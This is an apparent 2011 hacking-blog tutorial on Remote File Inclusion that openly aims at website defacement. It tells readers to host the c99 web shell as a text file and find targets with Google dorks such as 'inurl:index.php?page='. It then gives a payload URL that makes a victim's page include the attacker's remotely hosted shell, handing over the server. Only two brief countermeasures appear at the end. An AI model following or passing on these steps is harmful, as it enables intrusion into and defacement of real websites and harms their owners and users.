Happy DNN Hacking....@@@@@@

Remote File Inclusion (RFI) | Hack Website ( BASIC )

2011-05-03T16:51:00.002+05:30

RFI stands for Remote File Inclusion, and it allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, i suppose you will know what it is all about and may be able to deploy an attack or two.

RFI is a common vulnerability, and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything (including gagging them out or beg..well that's an exaggeration but I guess you get the idea :P ) . What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux..

Before starting this tutorial, I would like to tell you about a piece of code called as shell. There are many shells available . Lets consider a shell known as c99 shell. Download it from Internet.

Now signup for a account on any free web hosting site . Say 110mb.com. Now sign into your account,go to Filemanager, upload some files and then upload c99 shell here. Now just log out and visit the URL of shell you uploaded.

http://yourname.110mb.com/shell.php

and you would find that you can manage all your directories and files without logging in your account,that is without entering your password anywhere.

Note:Your account might be suspended after uploading such shells.

How to perform attack ?

Step 1. Upload a shell in text format on your web hosting site. That is just copy the code of shell and save it as text file and upload it. Note down the complete path of your shell.

Step 2. Search for the vulnerable site using google dorks. like:-

inurl:index.php?id=
inurl:index.php?page=

You can also use automated tools for the same.

Step3. Lets say you got any site like

http://www.victim.com/index.php?page=anything

Replace this URL by http://www.victim.com/index.php?page=http://yoursite.com/yourshell.txt?

Your shell might have uploaded on server if the victim's site is vulnerable. Now you can do any thing with victim's site or may be even with other sites running on same webserver by simply accessing your shell.

Possible Countermeasures :

1. Strongly validate the user's input.

2. Disable allow_url_fopen and allow_url_include in php.ini .

This is just a basic of RFI & WEB DEFACEMENT ....
In My Upcoming Articles I'll post some advance methods of Defacement..
So Stay in Touch & Keep Reading..

Post Your Comments & Feedbacks...@@@@